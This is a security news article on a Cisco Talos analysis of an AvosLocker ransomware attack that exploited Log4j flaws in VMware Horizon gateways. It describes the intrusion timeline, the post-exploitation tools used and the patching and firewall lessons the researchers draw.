Researchers have disclosed details on a ransomware attack that targeted the well-known Log4j flaw in order to deploy AvosLocker.
The month-long ransomware attack, which impacted an unnamed company, targeted instances of the VMware Horizon Unified Access Gateway that were vulnerable to the Log4j flaw. The attacker first exploited the series of Apache vulnerabilities related to Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832) that can potentially allow for remote code execution on vulnerable Unified Access Gateways via a low-privilege non-root user (‘gateway’). Threat actors used a newer variant of AvosLocker previously discovered earlier this year, which targets Linux environments in addition to Windows machines; the attack coupled with these recent changes demonstrate how AvosLocker is "likely to proliferate in the future," said Cisco Talos researchers in a Tuesday analysis.
"In the current ransomware cartel landscape [this recent attack] could be either an affiliate using their own TTPs or a new behavior that has been provided as part of the procedures provided by the cartel," said Guilherme Venere, researcher with Cisco Talos. "We commonly see these groups start leveraging new vulnerabilities in their attacks, for instance."
AvosLocker was first spotted in late June 2021 by researchers who called it “a solid, yet not too fancy new ransomware family.” Researchers with Sophos later in the year noted that ransomware attacks using AvosLocker started to increase in November and December. Some ransomware affiliates have used Microsoft Exchange server vulnerabilities as an intrusion vector, including the Proxy Shell vulnerabilities (CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473), in addition to CVE-2021-26855, a server-side request forgery flaw in Exchange. In other cases, AvosLocker has been spread through spam email campaigns and malvertising; however, because the ransomware operates on an affiliate model, the TTPs used to carry out attacks vary.
"We continue to see ransomware grow and evolve over time... Whether it is new cartels forming, new affiliates joining a cartel, or the cartel itself rebranding we continually see these groups evolve and change," said Venere. "This can include adding new vulnerabilities for exploitation, changing the tooling that the affiliates use, or changes in the ransomware that is being deployed. Avos is yet another example in these cartels."
Researchers were first notified of the incident on March 7, but the activity related to the attack was tracked as early as Feb. 7. After some brief activity from the threat actor post-initial access, the actor then went silent for a few weeks, before suddenly starting to deploy several different tools a month later, including a Cobalt Strike beacon, the Sliver red-team tool and commercial network scanners (such as “Scanner.exe,” or SoftPerfect Network Scanner, a commercially available product that AvosLocker has been known to deploy). Days later, the AvosLocker payload was finally delivered, with the attackers using a legitimate software deployment tool called PDQ Deploy to deploy the ransomware and other tools across the target network, said researchers. The victim’s files were then encrypted with a ransom note giving instructions for a payment.
Researchers also uncovered “significant evidence” that multiple threat actors had compromised the same victim network, which is not uncommon, particularly as attackers close in on environments that still have not patched against known, popular vulnerabilities like Log4j. In this incident, a RuntimeBrokerService.exe executable in "C:\Windows\System32\temp" had created a file (“watcher.exe”) that appeared to be related to a cryptocurrency miner.
“It is not uncommon for a miner to be deployed alongside ransomware in an attempt to passively increase revenue,” said researchers. “However, there is significant evidence that multiple threat actors had compromised this network, as DarkComet [RAT] samples unrelated to this campaign were also discovered.”
Researchers stressed that a layered defense model is critical for businesses to be able to detect and protect against the post-exploitation activity seen in this campaign. One security measure is patch management: After the Log4j flaw was first revealed in December, VMware released builds with patches that address the flaw impacting its Horizon servers and “highly recommended” that customers install the updates. Meanwhile, exploitation attempts have continued over the past few months especially in products that remain vulnerable to the flaw.
At the same time, after the threat actor gained initial access in this attack, “the inner-transit firewalls that could control or limit the access to the internal infrastructure were not configured, hence, the attackers used it as the initial access to establish a foothold on the customer's network, granting access to their internal servers,” said Cisco Talos researchers.
“This incident showcases the importance of ensuring that security appliances are properly set up and configured, updates and patches are applied and the security team is always monitoring alerts,” they said. “While the attack techniques used in this campaign are not novel, they are still effective if the proper precautions are not in place.”